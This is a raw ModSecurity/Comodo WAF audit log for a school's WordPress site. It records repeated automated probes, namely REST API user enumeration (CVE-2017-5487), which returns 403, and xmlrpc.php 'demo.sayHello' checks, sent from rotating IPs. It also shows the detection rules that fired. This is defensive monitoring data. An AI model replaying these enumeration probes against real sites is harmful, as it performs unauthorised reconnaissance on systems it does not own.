(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e039f969-Z-- --03e91567-A-- [10/May/2025:10:23:54 +0700] aB7GyhLuBiaF9R054QBbxAAAABM 103.236.140.4 54770 103.236.140.4 8181 --03e91567-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e91567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e91567-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847434967108 1941 (- - -) Stopwatch2: 1746847434967108 1941; combined=973, p1=340, p2=606, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e91567-Z-- --02af2417-A-- [10/May/2025:10:24:05 +0700] aB7G1auC4AqLGUOyzyX8AwAAAIE 103.236.140.4 54774 103.236.140.4 8181 --02af2417-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02af2417-C-- demo.sayHello --02af2417-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02af2417-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847445005787 5682 (- - -) Stopwatch2: 1746847445005787 5682; combined=4159, p1=541, p2=3401, p3=32, p4=33, p5=91, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02af2417-Z-- --274a7647-A-- [10/May/2025:10:29:54 +0700] aB7IMsi6w7GTj2w44Z6cZQAAAMo 103.236.140.4 54826 103.236.140.4 8181 --274a7647-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --274a7647-C-- demo.sayHello --274a7647-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --274a7647-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847794931116 4725 (- - -) Stopwatch2: 1746847794931116 4725; combined=3653, p1=468, p2=2989, p3=22, p4=26, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --274a7647-Z-- --dc586b45-A-- [10/May/2025:10:50:37 +0700] aB7NDRLuBiaF9R054QBb1QAAAAU 103.236.140.4 54930 103.236.140.4 8181 --dc586b45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dc586b45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc586b45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849037699772 2833 (- - -) Stopwatch2: 1746849037699772 2833; combined=1235, p1=438, p2=767, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc586b45-Z-- --4a689d0e-A-- [10/May/2025:10:50:45 +0700] aB7NFauC4AqLGUOyzyX8FQAAAIc 103.236.140.4 54934 103.236.140.4 8181 --4a689d0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a689d0e-C-- demo.sayHello --4a689d0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a689d0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849045373291 5776 (- - -) Stopwatch2: 1746849045373291 5776; combined=4256, p1=541, p2=3519, p3=27, p4=28, p5=82, sr=79, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a689d0e-Z-- --d5eb8e4f-A-- [10/May/2025:10:51:17 +0700] aB7NNauC4AqLGUOyzyX8FgAAAIk 103.236.140.4 54942 103.236.140.4 8181 --d5eb8e4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5eb8e4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5eb8e4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849077120090 3495 (- - -) Stopwatch2: 1746849077120090 3495; combined=1538, p1=558, p2=943, p3=0, p4=0, p5=37, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5eb8e4f-Z-- --160a2d7c-A-- [10/May/2025:10:51:21 +0700] aB7NORLuBiaF9R054QBb2QAAAAc 103.236.140.4 54946 103.236.140.4 8181 --160a2d7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --160a2d7c-C-- demo.sayHello --160a2d7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --160a2d7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849081452583 5142 (- - -) Stopwatch2: 1746849081452583 5142; combined=3938, p1=436, p2=3274, p3=36, p4=32, p5=93, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --160a2d7c-Z-- --3ae8e927-A-- [10/May/2025:10:51:23 +0700] aB7NOxLuBiaF9R054QBb2gAAABA 103.236.140.4 54948 103.236.140.4 8181 --3ae8e927-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ae8e927-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae8e927-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849083283995 3210 (- - -) Stopwatch2: 1746849083283995 3210; combined=1441, p1=511, p2=898, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae8e927-Z-- --6c49eb76-A-- [10/May/2025:10:51:30 +0700] aB7NQsi6w7GTj2w44Z6ccQAAAMU 103.236.140.4 54954 103.236.140.4 8181 --6c49eb76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c49eb76-C-- demo.sayHello --6c49eb76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c49eb76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849090470954 5801 (- - -) Stopwatch2: 1746849090470954 5801; combined=4195, p1=577, p2=3386, p3=32, p4=37, p5=99, sr=104, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c49eb76-Z-- --eaf59932-A-- [10/May/2025:10:52:07 +0700] aB7NZxLuBiaF9R054QBb3QAAABE 103.236.140.4 54964 103.236.140.4 8181 --eaf59932-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eaf59932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaf59932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849127461453 2811 (- - -) Stopwatch2: 1746849127461453 2811; combined=1266, p1=426, p2=810, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaf59932-Z-- --a8af4123-A-- [10/May/2025:10:52:15 +0700] aB7Nb8i6w7GTj2w44Z6ccgAAAMc 103.236.140.4 54968 103.236.140.4 8181 --a8af4123-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8af4123-C-- demo.sayHello --a8af4123-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8af4123-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849135178477 4778 (- - -) Stopwatch2: 1746849135178477 4778; combined=3651, p1=447, p2=3002, p3=25, p4=27, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8af4123-Z-- --faf46a51-A-- [10/May/2025:10:52:32 +0700] aB7NgMi6w7GTj2w44Z6ccwAAAMY 103.236.140.4 54972 103.236.140.4 8181 --faf46a51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --faf46a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf46a51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849152487269 3558 (- - -) Stopwatch2: 1746849152487269 3558; combined=1511, p1=485, p2=994, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf46a51-Z-- --fc79c90d-A-- [10/May/2025:10:52:44 +0700] aB7NjBLuBiaF9R054QBb3wAAABM 103.236.140.4 54976 103.236.140.4 8181 --fc79c90d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc79c90d-C-- demo.sayHello --fc79c90d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc79c90d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849164174773 6400 (- - -) Stopwatch2: 1746849164174773 6400; combined=4621, p1=619, p2=3760, p3=39, p4=43, p5=96, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc79c90d-Z-- --68d73053-A-- [10/May/2025:10:53:36 +0700] aB7NwBLuBiaF9R054QBb4AAAABQ 103.236.140.4 54980 103.236.140.4 8181 --68d73053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d73053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d73053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849216739304 3347 (- - -) Stopwatch2: 1746849216739304 3347; combined=1429, p1=486, p2=909, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d73053-Z-- --6e038120-A-- [10/May/2025:10:53:43 +0700] aB7NxxLuBiaF9R054QBb4QAAABU 103.236.140.4 54984 103.236.140.4 8181 --6e038120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e038120-C-- demo.sayHello --6e038120-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e038120-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849223766629 5020 (- - -) Stopwatch2: 1746849223766629 5020; combined=3728, p1=492, p2=3020, p3=27, p4=25, p5=95, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e038120-Z-- --e383dc4c-A-- [10/May/2025:10:53:50 +0700] aB7NzhLuBiaF9R054QBb4gAAABY 103.236.140.4 54988 103.236.140.4 8181 --e383dc4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e383dc4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e383dc4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849230573885 3493 (- - -) Stopwatch2: 1746849230573885 3493; combined=1544, p1=583, p2=931, p3=0, p4=0, p5=30, sr=179, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e383dc4c-Z-- --555aa615-A-- [10/May/2025:10:53:54 +0700] aB7N0quC4AqLGUOyzyX8IAAAAJU 103.236.140.4 54992 103.236.140.4 8181 --555aa615-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --555aa615-C-- demo.sayHello --555aa615-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --555aa615-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 